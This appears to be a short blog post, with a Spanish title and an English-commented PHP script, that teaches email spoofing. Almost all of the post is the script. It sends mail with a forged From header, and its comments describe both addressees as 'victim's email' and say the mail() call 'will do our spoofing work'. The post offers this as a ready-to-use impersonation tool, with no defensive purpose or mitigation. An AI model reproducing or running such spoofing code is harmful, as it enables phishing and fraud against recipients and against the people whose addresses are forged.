Falsificar un Email (Email Spoofing) + Código PHP
<?php
$to = "[email protected]"; //victim's email to whom you want to send an email
$subject = "email subject";
$message = "your message";
$from = "[email protected]"; // victim's email from whom you want to send an email
$headers = "From:" . $from;
$mail = mail($to,$subject,$message,$headers,$from); // this mail() will do our spoofing work
if($mail)
{
echo "Email sent to ".$to;
}
?>
Falsificar un Email (Email Spoofing) + Código PHP
Reviewed by Zion3R
on
13:00
Rating: